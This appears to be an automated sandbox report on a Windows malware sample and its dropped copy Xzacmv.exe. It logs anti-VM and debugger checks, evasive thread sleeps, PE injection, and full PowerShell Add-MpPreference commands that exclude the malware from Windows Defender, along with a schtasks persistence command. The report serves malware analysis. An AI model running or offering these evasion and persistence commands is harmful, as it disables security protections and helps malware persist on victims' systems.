Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: oAUBqI6vQ7.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Xzacmv.exe PID: 8160, type: MEMORYSTR

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Memory allocated: 18B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Memory allocated: 3210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Memory allocated: 5210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Memory allocated: 9500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Memory allocated: 7F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Memory allocated: A500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Memory allocated: B500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Memory allocated: F50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Memory allocated: 29F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Memory allocated: F50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Memory allocated: 8500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Memory allocated: 9500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Memory allocated: 96F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Memory allocated: A6F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6328	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1095	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7770	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1301	Jump to behavior

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe TID: 7636	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8064	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7956	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8116	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8088	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe TID: 8124	Thread sleep count: 66 > 30	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe TID: 8124	Thread sleep time: -3960000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe TID: 7268	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: oAUBqI6vQ7.exe, 00000009.00000002.2349385278.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, Xzacmv.exe, 0000000F.00000002.1455184895.0000000001568000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Xzacmv.exe

Code function: 15_2_0040317B mov eax, dword ptr fs:[00000030h]

15_2_0040317B

Source: C:\Users\user\AppData\Roaming\Xzacmv.exe

Code function: 15_2_00402B7C GetProcessHeap,HeapAlloc,

15_2_00402B7C

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oAUBqI6vQ7.exe"
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Xzacmv.exe"
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oAUBqI6vQ7.exe"	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Xzacmv.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Memory written: C:\Users\user\Desktop\oAUBqI6vQ7.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Memory written: C:\Users\user\AppData\Roaming\Xzacmv.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oAUBqI6vQ7.exe"	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Xzacmv.exe"	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmp9E72.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Users\user\Desktop\oAUBqI6vQ7.exe "C:\Users\user\Desktop\oAUBqI6vQ7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmpB3BF.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process created: C:\Users\user\AppData\Roaming\Xzacmv.exe "C:\Users\user\AppData\Roaming\Xzacmv.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process created: C:\Users\user\AppData\Roaming\Xzacmv.exe "C:\Users\user\AppData\Roaming\Xzacmv.exe"	Jump to behavior

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Queries volume information: C:\Users\user\Desktop\oAUBqI6vQ7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
